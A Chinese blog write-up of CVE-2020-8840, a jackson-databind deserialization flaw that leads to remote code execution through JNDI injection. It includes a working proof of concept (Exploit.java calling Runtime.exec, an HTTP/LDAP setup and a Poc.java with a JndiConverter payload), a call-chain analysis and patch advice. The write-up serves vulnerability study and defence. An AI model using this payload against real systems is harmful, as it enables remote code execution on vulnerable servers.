- 1Python第8章作业_python中把一个目录下所有的文件删除,在所有的目录下新建一个a.txt的文件,并在文
- 2python3 实现读写文件(xlsx文件/ini文件/json文件/yaml文件),代码已封装更新_python pandas 读取ini
- 3Github 错误合集:Failed connect to github.com:8080 || Failed connect to github.com:443; No error
- 4VS2010 切换到设计界面无响应的解决
- 5【机器学习】对抗生成网络
- 6库卡机器人Officelite运行EthernetKRL进行通讯
- 7spark总结
- 8TortoiseGit/TortoiseSVN差异查看器切换单/双区块模式,或使用外部对比工具_tortoisegit 双击文件,用beyond compare打开
- 9stm32 串口多字节接收
- 10mysql乘法函数_数据库入门(MySQL):mySQL运算符与mySQL常用函数
CVE-2020-8840:Jackson-databind RCE
赞
踩
影响范围
- jackson-databind before 2.9.10.3
- jackson-databind before 2.8.11.5
- jackson-databind before 2.7.9.7
漏洞类型
JDNI注入导致RCE
利用条件
- 开启enableDefaultTyping()
- 使用了org.apache.xbean.propertyeditor.JndiConverter第三方依赖
漏洞概述
2020年2月,jackson-databind在github上更新了一个新的反序列化利用类org.apache.xbean.propertyeditor.JndiConverter,该类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。
漏洞复现
环境搭建
pom.xml如下:
- <dependencies>
- <dependency>
- <groupId>com.fasterxml.jackson.core</groupId>
- <artifactId>jackson-databind</artifactId>
- <version>2.9.9.1</version>
- </dependency>
-
- <!-- https://mvnrepository.com/artifact/org.apache.xbean/xbean-reflect -->
- <dependency>
- <groupId>org.apache.xbean</groupId>
- <artifactId>xbean-reflect</artifactId>
- <version>4.17</version>
- </dependency>
-
- <dependency>
- <groupId>org.slf4j</groupId>
- <artifactId>slf4j-nop</artifactId>
- <version>1.7.2</version>
- </dependency>
- <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
- <dependency>
- <groupId>javax.transaction</groupId>
- <artifactId>jta</artifactId>
- <version>1.1</version>
- </dependency>
- </dependencies>
漏洞利用
这里使用LDAP的利用方式进行漏洞的利用演示,RMI的方式也是类似的,且RMI比LDAP要对JDK版本有很大的局限性~
LDAP利用方式:jdk版本:JDK 11.0.1、8u191、7u201、6u211之前,笔者这里采用JDK 1.8.0_181
编译Exploit.java
Exploit.java代码如下:
- import java.lang.Runtime;
-
- public class Exploit {
- static {
- try {
- Runtime.getRuntime().exec("calc");
- } catch (Exception e) {
- e.printStackTrace();
- }
- }
- }
编译Exploit.java文件:
搭建HTTP服务
使用Python搭建简易SimpleHTTPServer服务:
python -m SimpleHTTPServer 4444
搭建LDAP服务
使用marshalsec来启动一个LDAP服务:
执行漏洞POC1
Poc.java代码如下所示:
- package com.jacksonTest;
-
- import com.fasterxml.jackson.databind.ObjectMapper;
- import java.io.IOException;
-
- public class Poc {
- public static void main(String[] args) throws Exception {
- ObjectMapper mapper = new ObjectMapper();
- mapper.enableDefaultTyping();
- String payload = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://127.0.0.1:1099/Exploit\"}]";
- try {
- Object obj = mapper.readValue(payload, Object.class);
- } catch (IOException e) {
- e.printStackTrace();
- }
- }
- }
之后运行该程序,成功执行命令,弹出计算器:
漏洞分析
首先定位到org.apache.xbean.propertyeditor.JndiConverter类,发现在该类较为简单,且构造函数直接调用父类的构造方法,不过在该类中却调用了lookup对text进行查询,这一点需要留意,看后续是否有与toObjectImpl函数的相关调用点,之后跟进父类AbstractConvert:
在父类中搜索toObjectImpl发现在toObject中有调用,且参数为当前类的text:
之后继续查看toObject的调用,发现在setAsText处调用,且传递的参数为text可控:
综上所述,我们可以指定反序列化类为org.apache.xbean.propertyeditor.JndiConverter,之后指定set方法为asText,之后传递参数为ldap服务地址,之后在setAsText中调用toObject函数,之后在toObject中调用toObjectImp,之后在toObjectImp中执行lookup,从而导致JNDI,最终RCE~
整个利用链如下所示:
- mapper.readValue
- ->AbstractConverter.setAsText
- ->AbstractConverter.toObject
- ->JndiConverter.toObjectImpl
- ->lookup
补丁分析
官方在github的更新方式依旧是添加相关类到黑名单,但这种方式治标不治本,后续可能出现其他绕过黑名单的gdaget:
https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497
修复建议
- 及时将jackson-databind升级到安全版本
- 升级到较高版本的JDK。
参考链接
https://github.com/FasterXML/jackson-databind/issues/2620
https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497
